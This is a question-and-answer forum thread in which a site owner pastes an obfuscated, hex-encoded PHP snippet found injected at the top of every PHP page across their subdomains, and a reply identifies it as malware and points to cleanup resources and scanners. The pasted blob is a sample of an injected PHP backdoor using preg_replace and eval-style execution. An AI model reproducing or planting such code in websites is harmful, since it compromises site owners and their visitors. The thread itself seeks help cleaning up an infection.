Unkown line of code in my php files

Question

I had this code appear on ALL my php pages. on top line.

%x5c%x782f7rfs%x5c%x78256>1*!%x5c%x7825b:>1!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]25660%x6c%157%x64%145%x28%141%x72%162%x61%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825c%x782fh%x5c%x7825:s%x5c%x7825qx5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!1>2*!%x5c%x7825z>32j%x5c%x7825!*3!%x5c%x782%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!**6R85,67R37,18R#>q%x5c%x7825V!#]y76]277]y72]bnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUIdof%x5c%x786057ftbc%x5c%-#1GO%x5c%x7822#)fepmqyfA>2b%x5c%x7825!%x5c%x782f7&6|7**111127-K)ebf825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2b%x5c%x7825!*##>>X)!gjZb%x5c%x7h#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x73)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c6]277##]y74]273]y76]252]y85]2^%x5c%x7824-%x5c%x7824tvctus)%xx5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)sboepn)%x5c%x7825epnbs#QwTW%x5c%x7825hIr%x5c%x785c1^-%x5c%x782c#!%x5c%x7824Yppfepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%xx7825tww**WYsboepn)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x78%62%x35%165%x3a%146%x21%76%x21%50%x5#!bssbz)%x5c%x7824]25%x5c25)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:5c%x78256!#]D6M7]K3#n%x5c%x7825#]y3g]61]y3f]63]y3:]68]y76#%x5c%x7825s:%x5c%x785c%x5c%x7825j:^j%x5c%x825)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjux7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjudov%x5c%x7825*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7+9f5d816:+946:ce44#)zbssb!>!ss%x7825!|!*)323zbek!~!b%x554]y76#!#]y84]275]y83]273]y75c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^56]y6g]257]y86]267]y74]275]y7:]268]y7f#!%x%x7825-bubE{h%x5c%x7825)%x75%156%x61"]=1; function fjfgg($n){r25)3of:opjudovg!%x5c%x78242178}54+9**-)1%x5c%x782f298V,62bd%x5c%xubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256^#zsfvr#7824!>!fyqmpef)#%x5c%x7824*!#]y3d]51]y35]2FSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5ceturn chr(ord($n)-1);} @er}X;%x5c%x7860msvd}R;*msv%x5c%x7825)}.;%f%163%x70%154%x69%164%50%x22%134x61%156%x75%156%x61"])))) 8y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x787824y7%x5c%x7824-%x5c%x782ror_reporting(0); preg_replace("%x2f%50%x2e%52%x29%57%xx7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!u%x5c%x782%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x65","%x65%166%x61%154%x28%151%x6d%1ozcYufhA%x5c%x78272qj%x5c%x7825611!2p%x5c%x7825!*3>?*2b%85]82]y76]62]y3:]84#-!OVMM*>%x5c%x7822!ftmbg)!gjj%x5c%x7825!|!5c%x787f;!osvufs}w;*%x5c%x787f!>>%x5c%]51L3]84]y31M6]y3e]81#%x5c%x782f#7e:55946-tr.984:75983:48984:71]K9]7#]341]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]76!#46767~6#]D6]281L1#%x5c%x782f#M5]DgP5]D6##]D4id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256>%x5c%x7822:ftmbg39*x782f7#@#7%x5c%x782f7^#i25!-#2#%x5c%x782f#%x5c%x7825#%x!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]2JU,6:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{oj%x5c%x78256!%x5c%x7825i%x5c%x785c2^U#c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x7827&6!tussfw)%x5|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x5c%x7827&6!2p%56]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4>.%x5c%x7825!EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}825fdy)##-!#~%x5c%x7825s:%x5c%x785c%xd]252]y74]256]y39]252]y83]273]y72]282#%x5c%x78*#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!}&;!osvufs}x5c%x7825w:!>!%x5c%x7826,47R57,27R66,#%x5c%x5c%x782400~:>!}W;utpi}Y;tuoc%x7827&6%x5c%x7825fdy!%x5c%xx5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5*c%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.%jojRk3%x5c%x7860{666~6j%x5c%x7825!*9!%xx7878::h%x5c%x7825::iuhofm%xx5c%x7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5277]y72]265]y39]271]y83]256]y78]248]y83]256]y81]265]y72]2#fopoV;hojepdoF.uofuopD#)sfebfI{*w%x5c%x782%163%x74%141%x72%164") && (!isset($GLOBALS["%g)!gj!|!*msv%x5c%x7825)}k%x78256%x5%x7824!>!tus%x5c%x7860sfqmbdf)%x5c%x4*12q%x5c%x7825#]y31]278]y3e]815c%x7860un>qp%x5c%x7825!|Z~!!2p%x5c825j>1#p#%x5c%x782f#p#%x5c%x782f%x5c%x74-%x5c%x7824]26%x5c%x7824-%x5c%x7824j%x5c%x7825!q%x]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#!%x5c%x7825yy%x5c%x7825w6Z6>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x78253]83]238M7]381]211M5]67]452]88]5]48]32M3]317]44U!%x5c%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x78*2-4-bubE{h%x5c%x7825)sutcvt)esp>hmx5c%x7860UQPMSVD!-id%5c%x7825j:.2^,%x5c%x7825b:

I have subdomains that had wordpress installed and some that didn't. It effected all sites? I was able to restore my non wordpress subs. Anyclue what this is and how I can prevent in the future.

Thanks in advance.

Answer 1

That looks a lot like the obfuscated malicious code that I found in my own Wordpress site. Maybe consider these steps http://codex.wordpress.org/FAQ_My_site_was_hacked.

Try running the full code through this decoder http://ddecode.com/phpdecoder/ or scanning your site with the free Sucuri SiteCheck. You could also upload one of those files to https://www.virustotal.com.

btw, I have no affiliation with either of these sites. I only found them useful in my own situation.

Good luck!